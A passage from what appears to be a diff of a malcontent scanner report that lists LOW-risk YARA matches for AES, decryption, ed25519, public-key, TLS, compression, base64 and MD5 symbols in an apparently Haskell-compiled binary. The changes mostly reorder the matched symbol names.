[edentialsFindForDecryptingzugo1_info](https://github.com/search?q=edentialsFindForDecryptingzugo1_info&type=code)
[erAES128zuzdccbcDecrypt_closure](https://github.com/search?q=erAES128zuzdccbcDecrypt_closure&type=code)
[erAES128zuzdccbcDecrypt_info](https://github.com/search?q=erAES128zuzdccbcDecrypt_info&type=code)
[erAES128zuzdccfbDecrypt_closure](https://github.com/search?q=erAES128zuzdccfbDecrypt_closure&type=code)
[erAES128zuzdccfbDecrypt_info](https://github.com/search?q=erAES128zuzdccfbDecrypt_info&type=code)
[erAES192zuzdccbcDecrypt_closure](https://github.com/search?q=erAES192zuzdccbcDecrypt_closure&type=code)
[erAES192zuzdccbcDecrypt_info](https://github.com/search?q=erAES192zuzdccbcDecrypt_info&type=code)
[erAES192zuzdccfbDecrypt_closure](https://github.com/search?q=erAES192zuzdccfbDecrypt_closure&type=code)
[erAES192zuzdccfbDecrypt_info](https://github.com/search?q=erAES192zuzdccfbDecrypt_info&type=code)
[erAES256zuzdccbcDecrypt_closure](https://github.com/search?q=erAES256zuzdccbcDecrypt_closure&type=code)
[erAES256zuzdccbcDecrypt_info](https://github.com/search?q=erAES256zuzdccbcDecrypt_info&type=code)
[erAES256zuzdccfbDecrypt_closure](https://github.com/search?q=erAES256zuzdccfbDecrypt_closure&type=code)
[erAES256zuzdccfbDecrypt_info](https://github.com/search?q=erAES256zuzdccfbDecrypt_info&type=code)
[eyziECIES_deriveDecrypt_closure](https://github.com/search?q=eyziECIES_deriveDecrypt_closure&type=code)
[eyziECIES_deriveDecrypt_info](https://github.com/search?q=eyziECIES_deriveDecrypt_info&type=code)
[iAEAD_aeadSimpleDecrypt_closure](https://github.com/search?q=iAEAD_aeadSimpleDecrypt_closure&type=code)
[iAEAD_aeadSimpleDecrypt_info](https://github.com/search?q=iAEAD_aeadSimpleDecrypt_info&type=code)
[iTLSziStruct_zdbDecryptError1_closure](https://github.com/search?q=iTLSziStruct_zdbDecryptError1_closure&type=code)
[iTLSziStruct_zdbDecryptError_closure](https://github.com/search?q=iTLSziStruct_zdbDecryptError_closure&type=code)
[iTLSziStruct_zdbDecryptionFailed1_closu](https://github.com/search?q=iTLSziStruct_zdbDecryptionFailed1_closu&type=code)
[iTLSziStruct_zdbDecryptionFailed_closur](https://github.com/search?q=iTLSziStruct_zdbDecryptionFailed_closur&type=code)
[iTLSziStruct_zdmDecryptError_closure](https://github.com/search?q=iTLSziStruct_zdmDecryptError_closure&type=code)
[iTLSziStruct_zdmDecryptError_info](https://github.com/search?q=iTLSziStruct_zdmDecryptError_info&type=code)
[iTLSziStruct_zdmDecryptionFailed_closur](https://github.com/search?q=iTLSziStruct_zdmDecryptionFailed_closur&type=code)
[iTLSziStruct_zdmDecryptionFailed_info](https://github.com/search?q=iTLSziStruct_zdmDecryptionFailed_info&type=code)
[ipherAESzuzdccfbDecrypt_closure](https://github.com/search?q=ipherAESzuzdccfbDecrypt_closure&type=code)
[ipherAESzuzdccfbDecrypt_info](https://github.com/search?q=ipherAESzuzdccfbDecrypt_info&type=code)
[ipher_zdtczqBulkDecrypt1_closure](https://github.com/search?q=ipher_zdtczqBulkDecrypt1_closure&type=code)
[ipher_zdtczqBulkDecrypt2_closure](https://github.com/search?q=ipher_zdtczqBulkDecrypt2_closure&type=code)
[ipher_zdtczqBulkDecrypt3_bytes](https://github.com/search?q=ipher_zdtczqBulkDecrypt3_bytes&type=code)
[ipher_zdtczqBulkDecrypt_closure](https://github.com/search?q=ipher_zdtczqBulkDecrypt_closure&type=code)
[ive_zdwgcmAppendDecrypt_closure](https://github.com/search?q=ive_zdwgcmAppendDecrypt_closure&type=code)
[ive_zdwgcmAppendDecrypt_info](https://github.com/search?q=ive_zdwgcmAppendDecrypt_info&type=code)
[ive_zdwocbAppendDecrypt_closure](https://github.com/search?q=ive_zdwocbAppendDecrypt_closure&type=code)
[ive_zdwocbAppendDecrypt_info](https://github.com/search?q=ive_zdwocbAppendDecrypt_info&type=code)
[iveziZZip_pkwareDecryptByte_closure](https://github.com/search?q=iveziZZip_pkwareDecryptByte_closure&type=code)
[iveziZZip_pkwareDecryptByte_info](https://github.com/search?q=iveziZZip_pkwareDecryptByte_info&type=code)
[sziBlock_zddmcbcDecrypt_closure](https://github.com/search?q=sziBlock_zddmcbcDecrypt_closure&type=code)
[sziBlock_zddmcbcDecrypt_info](https://github.com/search?q=sziBlock_zddmcbcDecrypt_info&type=code)
[sziBlock_zddmcfbDecrypt_closure](https://github.com/search?q=sziBlock_zddmcfbDecrypt_closure&type=code)
[sziBlock_zddmcfbDecrypt_info](https://github.com/search?q=sziBlock_zddmcfbDecrypt_info&type=code)
[sziBlock_zddmxtsDecrypt10_closure](https://github.com/search?q=sziBlock_zddmxtsDecrypt10_closure&type=code)
[sziBlock_zddmxtsDecrypt11_bytes](https://github.com/search?q=sziBlock_zddmxtsDecrypt11_bytes&type=code)
[sziBlock_zddmxtsDecrypt12_closure](https://github.com/search?q=sziBlock_zddmxtsDecrypt12_closure&type=code)
[sziBlock_zddmxtsDecrypt13_bytes](https://github.com/search?q=sziBlock_zddmxtsDecrypt13_bytes&type=code)
[sziBlock_zddmxtsDecrypt1_closure](https://github.com/search?q=sziBlock_zddmxtsDecrypt1_closure&type=code)
[sziBlock_zddmxtsDecrypt2_closure](https://github.com/search?q=sziBlock_zddmxtsDecrypt2_closure&type=code)
[sziBlock_zddmxtsDecrypt3_closure](https://github.com/search?q=sziBlock_zddmxtsDecrypt3_closure&type=code)
[sziBlock_zddmxtsDecrypt4_closure](https://github.com/search?q=sziBlock_zddmxtsDecrypt4_closure&type=code)
[sziBlock_zddmxtsDecrypt5_closure](https://github.com/search?q=sziBlock_zddmxtsDecrypt5_closure&type=code)
[sziBlock_zddmxtsDecrypt6_closure](https://github.com/search?q=sziBlock_zddmxtsDecrypt6_closure&type=code)
[sziBlock_zddmxtsDecrypt7_bytes](https://github.com/search?q=sziBlock_zddmxtsDecrypt7_bytes&type=code)
[sziBlock_zddmxtsDecrypt8_closure](https://github.com/search?q=sziBlock_zddmxtsDecrypt8_closure&type=code)
[sziBlock_zddmxtsDecrypt9_bytes](https://github.com/search?q=sziBlock_zddmxtsDecrypt9_bytes&type=code)
[sziBlock_zddmxtsDecrypt_closure](https://github.com/search?q=sziBlock_zddmxtsDecrypt_closure&type=code)
[sziBlock_zddmxtsDecrypt_info](https://github.com/search?q=sziBlock_zddmxtsDecrypt_info&type=code)
[ziTLSziCrypto_kxDecrypt1_closure](https://github.com/search?q=ziTLSziCrypto_kxDecrypt1_closure&type=code)
[ziTLSziCrypto_kxDecrypt_closure](https://github.com/search?q=ziTLSziCrypto_kxDecrypt_closure&type=code)
[ziTLSziCrypto_kxDecrypt_info](https://github.com/search?q=ziTLSziCrypto_kxDecrypt_info&type=code) | +| LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [aes_256_cbc](https://github.com/search?q=aes_256_cbc&type=code)
[aes_encrypt](https://github.com/search?q=aes_encrypt&type=code)
[AES](https://github.com/search?q=AES&type=code) | +| LOW | [crypto/decrypt](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/decrypt.yara#decrypt) | decrypts data | [edentialsFindForDecryptingzugo1_closure](https://github.com/search?q=edentialsFindForDecryptingzugo1_closure&type=code)
[iTLSziStruct_zdbDecryptionFailed1_closu](https://github.com/search?q=iTLSziStruct_zdbDecryptionFailed1_closu&type=code)
[iTLSziStruct_zdbDecryptionFailed_closur](https://github.com/search?q=iTLSziStruct_zdbDecryptionFailed_closur&type=code)
[iTLSziStruct_zdmDecryptionFailed_closur](https://github.com/search?q=iTLSziStruct_zdmDecryptionFailed_closur&type=code)
[TypesziBlock_cbcDecryptGeneric_closure](https://github.com/search?q=TypesziBlock_cbcDecryptGeneric_closure&type=code)
[TypesziBlock_cfbDecryptGeneric_closure](https://github.com/search?q=TypesziBlock_cfbDecryptGeneric_closure&type=code)
[TypesziBlock_xtsDecryptGeneric_closure](https://github.com/search?q=TypesziBlock_xtsDecryptGeneric_closure&type=code)
[iTLSziStruct_zdbDecryptError1_closure](https://github.com/search?q=iTLSziStruct_zdbDecryptError1_closure&type=code)
[iTLSziStruct_zdmDecryptionFailed_info](https://github.com/search?q=iTLSziStruct_zdmDecryptionFailed_info&type=code)
[edentialsFindForDecryptingzugo1_info](https://github.com/search?q=edentialsFindForDecryptingzugo1_info&type=code)
[iTLSziStruct_zdbDecryptError_closure](https://github.com/search?q=iTLSziStruct_zdbDecryptError_closure&type=code)
[iTLSziStruct_zdmDecryptError_closure](https://github.com/search?q=iTLSziStruct_zdmDecryptError_closure&type=code)
[TypesziBlock_cbcDecryptGeneric_info](https://github.com/search?q=TypesziBlock_cbcDecryptGeneric_info&type=code)
[TypesziBlock_cfbDecryptGeneric_info](https://github.com/search?q=TypesziBlock_cfbDecryptGeneric_info&type=code)
[TypesziBlock_xtsDecryptGeneric_info](https://github.com/search?q=TypesziBlock_xtsDecryptGeneric_info&type=code)
[iveziZZip_pkwareDecryptByte_closure](https://github.com/search?q=iveziZZip_pkwareDecryptByte_closure&type=code)
[edentialsFindForDecrypting_closure](https://github.com/search?q=edentialsFindForDecrypting_closure&type=code)
[iTLSziStruct_zdmDecryptError_info](https://github.com/search?q=iTLSziStruct_zdmDecryptError_info&type=code)
[sziBlock_zddmxtsDecrypt10_closure](https://github.com/search?q=sziBlock_zddmxtsDecrypt10_closure&type=code)
[sziBlock_zddmxtsDecrypt12_closure](https://github.com/search?q=sziBlock_zddmxtsDecrypt12_closure&type=code)
[TLSziCipher_BulkDecrypt_con_info](https://github.com/search?q=TLSziCipher_BulkDecrypt_con_info&type=code)
[ipher_zdtczqBulkDecrypt1_closure](https://github.com/search?q=ipher_zdtczqBulkDecrypt1_closure&type=code)
[ipher_zdtczqBulkDecrypt2_closure](https://github.com/search?q=ipher_zdtczqBulkDecrypt2_closure&type=code)
[iveziZZip_pkwareDecryptByte_info](https://github.com/search?q=iveziZZip_pkwareDecryptByte_info&type=code)
[sziBlock_zddmxtsDecrypt1_closure](https://github.com/search?q=sziBlock_zddmxtsDecrypt1_closure&type=code)
[sziBlock_zddmxtsDecrypt2_closure](https://github.com/search?q=sziBlock_zddmxtsDecrypt2_closure&type=code)
[sziBlock_zddmxtsDecrypt3_closure](https://github.com/search?q=sziBlock_zddmxtsDecrypt3_closure&type=code)
[sziBlock_zddmxtsDecrypt4_closure](https://github.com/search?q=sziBlock_zddmxtsDecrypt4_closure&type=code)
[sziBlock_zddmxtsDecrypt5_closure](https://github.com/search?q=sziBlock_zddmxtsDecrypt5_closure&type=code)
[sziBlock_zddmxtsDecrypt6_closure](https://github.com/search?q=sziBlock_zddmxtsDecrypt6_closure&type=code)
[sziBlock_zddmxtsDecrypt8_closure](https://github.com/search?q=sziBlock_zddmxtsDecrypt8_closure&type=code)
[ziTLSziCrypto_kxDecrypt1_closure](https://github.com/search?q=ziTLSziCrypto_kxDecrypt1_closure&type=code)
[28AES128zuzdcxtsDecrypt_closure](https://github.com/search?q=28AES128zuzdcxtsDecrypt_closure&type=code)
[28AES192zuzdcxtsDecrypt_closure](https://github.com/search?q=28AES192zuzdcxtsDecrypt_closure&type=code)
[28AES256zuzdcxtsDecrypt_closure](https://github.com/search?q=28AES256zuzdcxtsDecrypt_closure&type=code)
[Primitive_zdwccmDecrypt_closure](https://github.com/search?q=Primitive_zdwccmDecrypt_closure&type=code)
[TLSziCipher_BulkDecrypt_closure](https://github.com/search?q=TLSziCipher_BulkDecrypt_closure&type=code)
[TypesziAEAD_aeadDecrypt_closure](https://github.com/search?q=TypesziAEAD_aeadDecrypt_closure&type=code)
[TypesziBlock_cbcDecrypt_closure](https://github.com/search?q=TypesziBlock_cbcDecrypt_closure&type=code)
[TypesziBlock_cfbDecrypt_closure](https://github.com/search?q=TypesziBlock_cfbDecrypt_closure&type=code)
[TypesziBlock_ecbDecrypt_closure](https://github.com/search?q=TypesziBlock_ecbDecrypt_closure&type=code)
[TypesziBlock_xtsDecrypt_closure](https://github.com/search?q=TypesziBlock_xtsDecrypt_closure&type=code)
[deImplZCaeadImplDecrypt_closure](https://github.com/search?q=deImplZCaeadImplDecrypt_closure&type=code)
[edentialsFindForDecrypting_info](https://github.com/search?q=edentialsFindForDecrypting_info&type=code)
[erAES128zuzdccbcDecrypt_closure](https://github.com/search?q=erAES128zuzdccbcDecrypt_closure&type=code)
[erAES128zuzdccfbDecrypt_closure](https://github.com/search?q=erAES128zuzdccfbDecrypt_closure&type=code)
[erAES192zuzdccbcDecrypt_closure](https://github.com/search?q=erAES192zuzdccbcDecrypt_closure&type=code)
[erAES192zuzdccfbDecrypt_closure](https://github.com/search?q=erAES192zuzdccfbDecrypt_closure&type=code)
[erAES256zuzdccbcDecrypt_closure](https://github.com/search?q=erAES256zuzdccbcDecrypt_closure&type=code)
[erAES256zuzdccfbDecrypt_closure](https://github.com/search?q=erAES256zuzdccfbDecrypt_closure&type=code)
[eyziECIES_deriveDecrypt_closure](https://github.com/search?q=eyziECIES_deriveDecrypt_closure&type=code)
[iAEAD_aeadSimpleDecrypt_closure](https://github.com/search?q=iAEAD_aeadSimpleDecrypt_closure&type=code)
[ipherAESzuzdccfbDecrypt_closure](https://github.com/search?q=ipherAESzuzdccfbDecrypt_closure&type=code)
[ipher_zdtczqBulkDecrypt_closure](https://github.com/search?q=ipher_zdtczqBulkDecrypt_closure&type=code)
[ive_zdwgcmAppendDecrypt_closure](https://github.com/search?q=ive_zdwgcmAppendDecrypt_closure&type=code)
[ive_zdwocbAppendDecrypt_closure](https://github.com/search?q=ive_zdwocbAppendDecrypt_closure&type=code)
[sziBlock_zddmcbcDecrypt_closure](https://github.com/search?q=sziBlock_zddmcbcDecrypt_closure&type=code)
[sziBlock_zddmcfbDecrypt_closure](https://github.com/search?q=sziBlock_zddmcfbDecrypt_closure&type=code)
[sziBlock_zddmxtsDecrypt11_bytes](https://github.com/search?q=sziBlock_zddmxtsDecrypt11_bytes&type=code)
[sziBlock_zddmxtsDecrypt13_bytes](https://github.com/search?q=sziBlock_zddmxtsDecrypt13_bytes&type=code)
[sziBlock_zddmxtsDecrypt_closure](https://github.com/search?q=sziBlock_zddmxtsDecrypt_closure&type=code)
[ziTLSziCrypto_kxDecrypt_closure](https://github.com/search?q=ziTLSziCrypto_kxDecrypt_closure&type=code)
[ipher_zdtczqBulkDecrypt3_bytes](https://github.com/search?q=ipher_zdtczqBulkDecrypt3_bytes&type=code)
[sziBlock_zddmxtsDecrypt7_bytes](https://github.com/search?q=sziBlock_zddmxtsDecrypt7_bytes&type=code)
[sziBlock_zddmxtsDecrypt9_bytes](https://github.com/search?q=sziBlock_zddmxtsDecrypt9_bytes&type=code)
[28AES128zuzdcxtsDecrypt_info](https://github.com/search?q=28AES128zuzdcxtsDecrypt_info&type=code)
[28AES192zuzdcxtsDecrypt_info](https://github.com/search?q=28AES192zuzdcxtsDecrypt_info&type=code)
[28AES256zuzdcxtsDecrypt_info](https://github.com/search?q=28AES256zuzdcxtsDecrypt_info&type=code)
[Primitive_zdwccmDecrypt_info](https://github.com/search?q=Primitive_zdwccmDecrypt_info&type=code)
[TypesziAEAD_aeadDecrypt_info](https://github.com/search?q=TypesziAEAD_aeadDecrypt_info&type=code)
[TypesziBlock_cbcDecrypt_info](https://github.com/search?q=TypesziBlock_cbcDecrypt_info&type=code)
[TypesziBlock_cfbDecrypt_info](https://github.com/search?q=TypesziBlock_cfbDecrypt_info&type=code)
[TypesziBlock_ecbDecrypt_info](https://github.com/search?q=TypesziBlock_ecbDecrypt_info&type=code)
[TypesziBlock_xtsDecrypt_info](https://github.com/search?q=TypesziBlock_xtsDecrypt_info&type=code)
[deImplZCaeadImplDecrypt_info](https://github.com/search?q=deImplZCaeadImplDecrypt_info&type=code)
[erAES128zuzdccbcDecrypt_info](https://github.com/search?q=erAES128zuzdccbcDecrypt_info&type=code)
[erAES128zuzdccfbDecrypt_info](https://github.com/search?q=erAES128zuzdccfbDecrypt_info&type=code)
[erAES192zuzdccbcDecrypt_info](https://github.com/search?q=erAES192zuzdccbcDecrypt_info&type=code)
[erAES192zuzdccfbDecrypt_info](https://github.com/search?q=erAES192zuzdccfbDecrypt_info&type=code)
[erAES256zuzdccbcDecrypt_info](https://github.com/search?q=erAES256zuzdccbcDecrypt_info&type=code)
[erAES256zuzdccfbDecrypt_info](https://github.com/search?q=erAES256zuzdccfbDecrypt_info&type=code)
[eyziECIES_deriveDecrypt_info](https://github.com/search?q=eyziECIES_deriveDecrypt_info&type=code)
[iAEAD_aeadSimpleDecrypt_info](https://github.com/search?q=iAEAD_aeadSimpleDecrypt_info&type=code)
[ipherAESzuzdccfbDecrypt_info](https://github.com/search?q=ipherAESzuzdccfbDecrypt_info&type=code)
[ive_zdwgcmAppendDecrypt_info](https://github.com/search?q=ive_zdwgcmAppendDecrypt_info&type=code)
[ive_zdwocbAppendDecrypt_info](https://github.com/search?q=ive_zdwocbAppendDecrypt_info&type=code)
[sziBlock_zddmcbcDecrypt_info](https://github.com/search?q=sziBlock_zddmcbcDecrypt_info&type=code)
[sziBlock_zddmcfbDecrypt_info](https://github.com/search?q=sziBlock_zddmcfbDecrypt_info&type=code)
[sziBlock_zddmxtsDecrypt_info](https://github.com/search?q=sziBlock_zddmxtsDecrypt_info&type=code)
[ziTLSziCrypto_kxDecrypt_info](https://github.com/search?q=ziTLSziCrypto_kxDecrypt_info&type=code) | | LOW | [crypto/ed25519](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/ed25519.yara#ed25519) | Elliptic curve algorithm used by TLS and SSH | [ed25519](https://github.com/search?q=ed25519&type=code) | -| LOW | [crypto/public_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/public_key.yara#public_key) | references a 'public key' | [PublicKey](https://github.com/search?q=PublicKey&type=code)
[public key](https://github.com/search?q=public+key&type=code)
[publicKey](https://github.com/search?q=publicKey&type=code)
[public_key](https://github.com/search?q=public_key&type=code)
[publickey](https://github.com/search?q=publickey&type=code) | +| LOW | [crypto/public_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/public_key.yara#public_key) | references a 'public key' | [public key](https://github.com/search?q=public+key&type=code)
[public_key](https://github.com/search?q=public_key&type=code)
[PublicKey](https://github.com/search?q=PublicKey&type=code)
[publicKey](https://github.com/search?q=publicKey&type=code)
[publickey](https://github.com/search?q=publickey&type=code) | | LOW | [crypto/tls](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/tls.yara#tls) | tls | [TLS13](https://github.com/search?q=TLS13&type=code) | | LOW | [data/compression/bzip2](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/bzip2.yara#bzip2) | Works with bzip2 files | [bzip2](https://github.com/search?q=bzip2&type=code) | | LOW | [data/compression/gzip](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/gzip.yara#gzip) | [works with gzip files](https://www.gnu.org/software/gzip/) | [gzip](https://github.com/search?q=gzip&type=code) | @@ -99,7 +99,7 @@ | LOW | [data/compression/zlib](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/zlib.yara#zlib) | uses zlib | [zlib](https://github.com/search?q=zlib&type=code) | | LOW | [data/compression/zstd](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/zstd.yara#zstd) | Zstandard: fast real-time compression algorithm | [zstd](https://github.com/search?q=zstd&type=code) | | LOW | [data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64) | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) | -| LOW | [data/hash/md5](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/md5.yara#MD5) | Uses the MD5 signature format | [MD5_MD5_closure_tbl](https://github.com/search?q=MD5_MD5_closure_tbl&type=code)
[MD5_MD5_con_info](https://github.com/search?q=MD5_MD5_con_info&type=code)
[MD5_czumd5zufinalizz](https://github.com/search?q=MD5_czumd5zufinalizz&type=code)
[MD5_czumd5zuinit_clo](https://github.com/search?q=MD5_czumd5zuinit_clo&type=code)
[MD5_czumd5zuinit_inf](https://github.com/search?q=MD5_czumd5zuinit_inf&type=code)
[MD5_czumd5zuupdate_c](https://github.com/search?q=MD5_czumd5zuupdate_c&type=code)
[MD5_czumd5zuupdate_i](https://github.com/search?q=MD5_czumd5zuupdate_i&type=code)
[MD5_info](https://github.com/search?q=MD5_info&type=code)
[MD5_str](https://github.com/search?q=MD5_str&type=code)
[MD5_zdfDataMD10_clos](https://github.com/search?q=MD5_zdfDataMD10_clos&type=code)
[MD5_zdfDataMD11_byte](https://github.com/search?q=MD5_zdfDataMD11_byte&type=code)
[MD5_zdfDataMD12_clos](https://github.com/search?q=MD5_zdfDataMD12_clos&type=code)
[MD5_zdfDataMD12_info](https://github.com/search?q=MD5_zdfDataMD12_info&type=code)
[MD5_zdfDataMD1_closu](https://github.com/search?q=MD5_zdfDataMD1_closu&type=code)
[MD5_zdfDataMD2_closu](https://github.com/search?q=MD5_zdfDataMD2_closu&type=code)
[MD5_zdfDataMD2_info](https://github.com/search?q=MD5_zdfDataMD2_info&type=code)
[MD5_zdfDataMD3_closu](https://github.com/search?q=MD5_zdfDataMD3_closu&type=code)
[MD5_zdfDataMD3_info](https://github.com/search?q=MD5_zdfDataMD3_info&type=code)
[MD5_zdfDataMD4_closu](https://github.com/search?q=MD5_zdfDataMD4_closu&type=code)
[MD5_zdfDataMD4_info](https://github.com/search?q=MD5_zdfDataMD4_info&type=code)
[MD5_zdfDataMD5_closu](https://github.com/search?q=MD5_zdfDataMD5_closu&type=code)
[MD5_zdfDataMD5zuzdcd](https://github.com/search?q=MD5_zdfDataMD5zuzdcd&type=code)
[MD5_zdfDataMD5zuzdcg](https://github.com/search?q=MD5_zdfDataMD5zuzdcg&type=code)
[MD5_zdfDataMD5zuzdct](https://github.com/search?q=MD5_zdfDataMD5zuzdct&type=code)
[MD5_zdfDataMD6_closu](https://github.com/search?q=MD5_zdfDataMD6_closu&type=code)
[MD5_zdfDataMD7_closu](https://github.com/search?q=MD5_zdfDataMD7_closu&type=code)
[MD5_zdfDataMD8_closu](https://github.com/search?q=MD5_zdfDataMD8_closu&type=code)
[MD5_zdfDataMD9_closu](https://github.com/search?q=MD5_zdfDataMD9_closu&type=code)
[MD5_zdfHashAlgorithm](https://github.com/search?q=MD5_zdfHashAlgorithm&type=code)
[MD5_zdfShowMD1_closu](https://github.com/search?q=MD5_zdfShowMD1_closu&type=code)
[MD5_zdfShowMD1_info](https://github.com/search?q=MD5_zdfShowMD1_info&type=code)
[MD5_zdfShowMD2_closu](https://github.com/search?q=MD5_zdfShowMD2_closu&type=code)
[MD5_zdfShowMD5_closu](https://github.com/search?q=MD5_zdfShowMD5_closu&type=code)
[MD5_zdfShowMD5zuzdcs](https://github.com/search?q=MD5_zdfShowMD5zuzdcs&type=code)
[MD5_zdtcMD1_closure](https://github.com/search?q=MD5_zdtcMD1_closure&type=code)
[MD5_zdtcMD2_bytes](https://github.com/search?q=MD5_zdtcMD2_bytes&type=code)
[MD5_zdtcMD5_closure](https://github.com/search?q=MD5_zdtcMD5_closure&type=code)
[MD5_zdtczqMD1_closur](https://github.com/search?q=MD5_zdtczqMD1_closur&type=code)
[MD5_zdtczqMD2_closur](https://github.com/search?q=MD5_zdtczqMD2_closur&type=code)
[MD5_zdtczqMD3_bytes](https://github.com/search?q=MD5_zdtczqMD3_bytes&type=code)
[MD5_zdtczqMD5_closur](https://github.com/search?q=MD5_zdtczqMD5_closur&type=code)
[MD5_zdtrModule1_clos](https://github.com/search?q=MD5_zdtrModule1_clos&type=code)
[MD5_zdtrModule2_byte](https://github.com/search?q=MD5_zdtrModule2_byte&type=code)
[MD5_zdtrModule3_clos](https://github.com/search?q=MD5_zdtrModule3_clos&type=code)
[MD5_zdtrModule4_byte](https://github.com/search?q=MD5_zdtrModule4_byte&type=code)
[MD5_zdtrModule_closu](https://github.com/search?q=MD5_zdtrModule_closu&type=code)
[MD5_zdwzdcgmapMo_clo](https://github.com/search?q=MD5_zdwzdcgmapMo_clo&type=code)
[MD5_zdwzdcgmapMo_inf](https://github.com/search?q=MD5_zdwzdcgmapMo_inf&type=code)
[MD5_zdwzdcgmapMp_clo](https://github.com/search?q=MD5_zdwzdcgmapMp_clo&type=code)
[MD5_zdwzdcgmapMp_inf](https://github.com/search?q=MD5_zdwzdcgmapMp_inf&type=code) | +| LOW | [data/hash/md5](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/md5.yara#MD5) | Uses the MD5 signature format | [MD5_czumd5zufinalizz](https://github.com/search?q=MD5_czumd5zufinalizz&type=code)
[MD5_czumd5zuinit_clo](https://github.com/search?q=MD5_czumd5zuinit_clo&type=code)
[MD5_czumd5zuinit_inf](https://github.com/search?q=MD5_czumd5zuinit_inf&type=code)
[MD5_czumd5zuupdate_c](https://github.com/search?q=MD5_czumd5zuupdate_c&type=code)
[MD5_czumd5zuupdate_i](https://github.com/search?q=MD5_czumd5zuupdate_i&type=code)
[MD5_zdfDataMD10_clos](https://github.com/search?q=MD5_zdfDataMD10_clos&type=code)
[MD5_zdfDataMD11_byte](https://github.com/search?q=MD5_zdfDataMD11_byte&type=code)
[MD5_zdfDataMD12_clos](https://github.com/search?q=MD5_zdfDataMD12_clos&type=code)
[MD5_zdfDataMD12_info](https://github.com/search?q=MD5_zdfDataMD12_info&type=code)
[MD5_zdfDataMD1_closu](https://github.com/search?q=MD5_zdfDataMD1_closu&type=code)
[MD5_zdfDataMD2_closu](https://github.com/search?q=MD5_zdfDataMD2_closu&type=code)
[MD5_zdfDataMD3_closu](https://github.com/search?q=MD5_zdfDataMD3_closu&type=code)
[MD5_zdfDataMD4_closu](https://github.com/search?q=MD5_zdfDataMD4_closu&type=code)
[MD5_zdfDataMD5_closu](https://github.com/search?q=MD5_zdfDataMD5_closu&type=code)
[MD5_zdfDataMD5zuzdcd](https://github.com/search?q=MD5_zdfDataMD5zuzdcd&type=code)
[MD5_zdfDataMD5zuzdcg](https://github.com/search?q=MD5_zdfDataMD5zuzdcg&type=code)
[MD5_zdfDataMD5zuzdct](https://github.com/search?q=MD5_zdfDataMD5zuzdct&type=code)
[MD5_zdfDataMD6_closu](https://github.com/search?q=MD5_zdfDataMD6_closu&type=code)
[MD5_zdfDataMD7_closu](https://github.com/search?q=MD5_zdfDataMD7_closu&type=code)
[MD5_zdfDataMD8_closu](https://github.com/search?q=MD5_zdfDataMD8_closu&type=code)
[MD5_zdfDataMD9_closu](https://github.com/search?q=MD5_zdfDataMD9_closu&type=code)
[MD5_zdfHashAlgorithm](https://github.com/search?q=MD5_zdfHashAlgorithm&type=code)
[MD5_zdfShowMD1_closu](https://github.com/search?q=MD5_zdfShowMD1_closu&type=code)
[MD5_zdfShowMD2_closu](https://github.com/search?q=MD5_zdfShowMD2_closu&type=code)
[MD5_zdfShowMD5_closu](https://github.com/search?q=MD5_zdfShowMD5_closu&type=code)
[MD5_zdfShowMD5zuzdcs](https://github.com/search?q=MD5_zdfShowMD5zuzdcs&type=code)
[MD5_zdtczqMD1_closur](https://github.com/search?q=MD5_zdtczqMD1_closur&type=code)
[MD5_zdtczqMD2_closur](https://github.com/search?q=MD5_zdtczqMD2_closur&type=code)
[MD5_zdtczqMD5_closur](https://github.com/search?q=MD5_zdtczqMD5_closur&type=code)
[MD5_zdtrModule1_clos](https://github.com/search?q=MD5_zdtrModule1_clos&type=code)
[MD5_zdtrModule2_byte](https://github.com/search?q=MD5_zdtrModule2_byte&type=code)
[MD5_zdtrModule3_clos](https://github.com/search?q=MD5_zdtrModule3_clos&type=code)
[MD5_zdtrModule4_byte](https://github.com/search?q=MD5_zdtrModule4_byte&type=code)
[MD5_zdtrModule_closu](https://github.com/search?q=MD5_zdtrModule_closu&type=code)
[MD5_zdwzdcgmapMo_clo](https://github.com/search?q=MD5_zdwzdcgmapMo_clo&type=code)
[MD5_zdwzdcgmapMo_inf](https://github.com/search?q=MD5_zdwzdcgmapMo_inf&type=code)
[MD5_zdwzdcgmapMp_clo](https://github.com/search?q=MD5_zdwzdcgmapMp_clo&type=code)
[MD5_zdwzdcgmapMp_inf](https://github.com/search?q=MD5_zdwzdcgmapMp_inf&type=code)
[MD5_MD5_closure_tbl](https://github.com/search?q=MD5_MD5_closure_tbl&type=code)
[MD5_zdfDataMD2_info](https://github.com/search?q=MD5_zdfDataMD2_info&type=code)
[MD5_zdfDataMD3_info](https://github.com/search?q=MD5_zdfDataMD3_info&type=code)
[MD5_zdfDataMD4_info](https://github.com/search?q=MD5_zdfDataMD4_info&type=code)
[MD5_zdfShowMD1_info](https://github.com/search?q=MD5_zdfShowMD1_info&type=code)
[MD5_zdtcMD1_closure](https://github.com/search?q=MD5_zdtcMD1_closure&type=code)
[MD5_zdtcMD5_closure](https://github.com/search?q=MD5_zdtcMD5_closure&type=code)
[MD5_zdtczqMD3_bytes](https://github.com/search?q=MD5_zdtczqMD3_bytes&type=code)
[MD5_zdtcMD2_bytes](https://github.com/search?q=MD5_zdtcMD2_bytes&type=code)
[MD5_MD5_con_info](https://github.com/search?q=MD5_MD5_con_info&type=code)
[MD5_info](https://github.com/search?q=MD5_info&type=code)
